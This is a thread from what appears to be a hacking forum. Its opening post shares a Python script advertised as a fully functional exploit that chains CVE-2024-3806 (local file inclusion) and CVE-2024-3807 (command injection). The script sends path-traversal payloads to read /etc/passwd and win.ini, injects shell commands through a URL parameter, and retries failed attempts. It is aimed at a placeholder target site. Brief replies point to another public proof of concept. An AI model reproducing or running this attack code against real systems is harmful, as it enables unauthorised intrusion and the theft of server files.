Exploits: CVE-2024-3806-AND-CVE-2024-3807
by USDoD - Monday August 19, 2024 at 09:55 PM
#1
Hello, good morning.

Here is a complete and fully functional exploits for both CVE's, I merged both into one single script

#!/usr/bin/env python3 """ Advanced Exploit Script for CVE-2024-3806 (LFI) and CVE-2024-3807 (Command Injection) Author: USDoD """ import requests import urllib.parse import logging import time # Setup logging logging.basicConfig(level=logging.INFO, format='%(asctime)s - %(levelname)s - %(message)s') # Step 1: Generate LFI Payloads Dynamically def generate_lfi_payloads(base_path):     payloads = [         f"{base_path}../../../../../../etc/passwd",  # Unix-like systems         f"{base_path}../../../../../../windows/win.ini",  # Windows systems     ]     logging.info(f"Generated {len(payloads)} LFI payloads.")     return payloads # Step 2: Exploit LFI (CVE-2024-3806) to read sensitive files def exploit_lfi(session, lfi_url, lfi_payload):     try:         encoded_payload = urllib.parse.quote(lfi_payload)         full_lfi_url = f"{lfi_url}?file={encoded_payload}"         logging.info(f"Attempting LFI with URL: {full_lfi_url}")                 response = session.get(full_lfi_url, timeout=10)                 if response.status_code == 200 and response.text:             logging.info("LFI successful. Retrieved content:")             logging.info(response.text[:500])  # Print first 500 characters for brevity             return response.text         else:             logging.warning(f"LFI failed with status code {response.status_code} or empty response.")             return None     except requests.exceptions.RequestException as e:         logging.error(f"LFI request failed: {e}")         return None # Step 3: Exploit Command Injection (CVE-2024-3807) to achieve RCE def exploit_command_injection(session, command_injection_url, command_payload):     try:         encoded_payload = urllib.parse.quote(command_payload)         full_command_url = f"{command_injection_url}?cmd={encoded_payload}"         logging.info(f"Attempting Command Injection with URL: {full_command_url}")                 response = session.get(full_command_url, timeout=10)         if response.status_code == 200 and response.text:             logging.info("Command Injection successful. Command output:")             logging.info(response.text[:500])  # Print first 500 characters for brevity             return response.text         else:             logging.warning(f"Command Injection failed with status code {response.status_code} or empty response.")             return None     except requests.exceptions.RequestException as e:         logging.error(f"Command Injection request failed: {e}")         return None # Step 4: Parse Results and Extract Data def extract_sensitive_data(response_text, search_strings):     extracted_data = {}     for search_string in search_strings:         if search_string in response_text:             extracted_data[search_string] = response_text.split(search_string)[1].split("\n")[0]     return extracted_data # Step 5: Retry Mechanism for Robustness def retry_exploit(func, *args, retries=3, delay=5):     for attempt in range(retries):         result = func(*args)         if result:             return result         logging.warning(f"Retrying {func.__name__} (Attempt {attempt + 1}/{retries}) in {delay} seconds...")         time.sleep(delay)     logging.error(f"All {retries} attempts to run {func.__name__} failed.")     return None # Combined Exploit Function def combined_exploit(lfi_url, command_injection_url):     session = requests.Session()  # Use a session to maintain state, like cookies     # Generate LFI payloads     lfi_payloads = generate_lfi_payloads(base_path="")     for lfi_payload in lfi_payloads:         passwd_file_content = retry_exploit(exploit_lfi, session, lfi_url, lfi_payload)         if passwd_file_content and "root:x" in passwd_file_content:             logging.info("/etc/passwd file retrieved successfully.")                         # If LFI successful, proceed with Command Injection             command_payload = "cat /etc/passwd"             retry_exploit(exploit_command_injection, session, command_injection_url, command_payload)             break         else:             logging.warning(f"LFI did not succeed or /etc/passwd not found with payload: {lfi_payload}") # URLs of the vulnerable endpoints lfi_url = "http://target-site.com/vulnerable_lfi_endpoint" command_injection_url = "http://target-site.com/vulnerable_command_injection_endpoint" # Execute the combined exploit combined_exploit(lfi_url, command_injection_url)
Ban reason: Self-Ban | https://raidforums.hn/Forum-Ban-Appeals if you wish to be unbanned in the future. (Permanent)
Reply
#2
hummm someone merged them before: https://github.com/truonghuuphuc/CVE-202...4-3807-Poc
Ban reason: Go to the moon (Permanent)
Reply
#3
I prefer doing this manually because I enjoy the thrill of handling everything myself. Using an automated tool might overlook important details that I want to manage personally.
Ban reason: Sale of public leaks + attempted scam and manipulation. Shame. | https://raidforums.hn/Forum-Ban-Appeals if you feel this is incorrect. (Permanent)
Reply


Possibly Related Threads…
Thread Author Replies Views Last Post
  Google Dorks for finding SQL injection vulnerabilities and other security issues 1yush 65 2,462 07-02-2026, 02:50 AM
Last Post: NyxeraVX
  {SECRET} DATABASE OF EXPLOITS lulagain 427 23,910 07-02-2026, 02:48 AM
Last Post: NyxeraVX
  CVE-2025-40554 - SolarWinds Web Help Desk Auth Bypass & RCE PoC miyako 3 76 02-07-2026, 03:32 PM
Last Post: cysc
  POC CVE-2025-24071 caca28sapo1 15 807 02-07-2026, 08:53 AM
Last Post: hacker0123
  HPE OneView RCE Exploit [CVE-2025-37164] Hawx01 8 263 02-06-2026, 07:08 PM
Last Post: hacker0123



 Users browsing this thread: 1 Guest(s)